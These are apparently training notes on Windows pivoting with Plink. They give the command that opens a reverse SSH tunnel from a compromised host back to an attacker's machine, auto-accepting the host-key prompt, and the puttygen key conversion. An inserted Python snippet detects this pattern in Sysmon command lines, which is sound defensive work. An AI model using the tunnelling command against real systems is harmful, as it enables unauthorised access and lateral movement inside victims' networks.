windows pivoting
// reverse connection from windows box to our attacker box / tunnel
Generally speaking, Windows servers are unlikely to have an SSH server running,
so our use of Plink tends to be a case of transporting the binary to the target,
then using it to create a reverse connection back to the attacking machine.
This would be done with the following command:
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
Notice that this syntax is nearly identical to the one used previously with the
standard OpenSSH client. The cmd.exe /c echo y at the start is for non-interactive shells
(like most reverse shells, Windows shells being notoriously difficult to stabilise):
it answers the host-key warning that appears because the target has not connected
to this host before, which would otherwise block the command from running.
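From the defender's side, the same command line is a useful detection signature. The following is an added example (not part of the original notes) that scans constructed Sysmon-style process command lines for the Plink reverse-forward pattern described above: the -R LOCAL_PORT:TARGET_IP:TARGET_PORT form, the -N tunnel-only flag, and the echo y | prefix used to auto-accept the host key. The sample command lines and the host/port values in them are constructed for this example.

```python
import re

# Constructed process command lines for this example (not real telemetry);
# the field would be CommandLine in a Sysmon Event ID 1 record.
SAMPLE_COMMAND_LINES = [
    r".\plink.exe -R 1337:127.0.0.1:3389 user@10.10.14.5 -i key.ppk -N",
    r'"C:\Program Files\PuTTY\plink.exe" -ssh admin@fileserver',
    r"cmd.exe /c echo y | .\plink.exe -R 8080:10.200.1.10:80 user@10.10.14.5 -i key.ppk -N",
]

PLINK_RE = re.compile(r"plink(\.exe)?\b", re.IGNORECASE)
# The -R LOCAL_PORT:TARGET_IP:TARGET_PORT form shown on this page.
FORWARD_RE = re.compile(r"-R\s+(\d+):([^:\s]+):(\d+)")
ECHO_Y_RE = re.compile(r"echo\s+y\s*\|", re.IGNORECASE)
NO_COMMAND_RE = re.compile(r"(^|\s)-N(\s|$)")


def parse_reverse_forward(cmd):
    """Return the -R forward spec as a dict, or None when there is none."""
    m = FORWARD_RE.search(cmd)
    if not m:
        return None
    return {"listen_port": int(m.group(1)), "target_host": m.group(2),
            "target_port": int(m.group(3))}


def plink_tunnel_indicators(cmd):
    """Reasons this command line looks like a Plink reverse tunnel (empty = nothing suspicious)."""
    reasons = []
    if not PLINK_RE.search(cmd):
        return reasons
    fwd = parse_reverse_forward(cmd)
    if fwd:
        reasons.append("remote forward -R to %s:%d" % (fwd["target_host"], fwd["target_port"]))
        if fwd["target_host"] not in ("127.0.0.1", "localhost"):
            reasons.append("forward target is a third host: possible pivot")
    if NO_COMMAND_RE.search(cmd):
        reasons.append("-N: no remote command, tunnel only")
    if ECHO_Y_RE.search(cmd):
        reasons.append("host-key prompt auto-accepted with 'echo y |'")
    return reasons


def scan(command_lines):
    """Return (command line, reasons) pairs for every entry with at least one indicator."""
    return [(c, plink_tunnel_indicators(c)) for c in command_lines if plink_tunnel_indicators(c)]
```

A plain interactive plink.exe -ssh session (second sample) produces no indicators, while a forward whose target is not the loopback address is additionally flagged as a possible pivot into a further internal host.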
Note that any keys generated by ssh-keygen will not work properly here.
You will need to convert them using the puttygen tool, which can be installed on Kali
using sudo apt install putty-tools.
After installing the tool, conversion can be done with:
puttygen KEYFILE -o OUTPUT_KEY.ppk
substituting in a valid file for the keyfile, and adding in the output file name.
Downloading a new copy of Plink is sensible; the latest release is available from:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html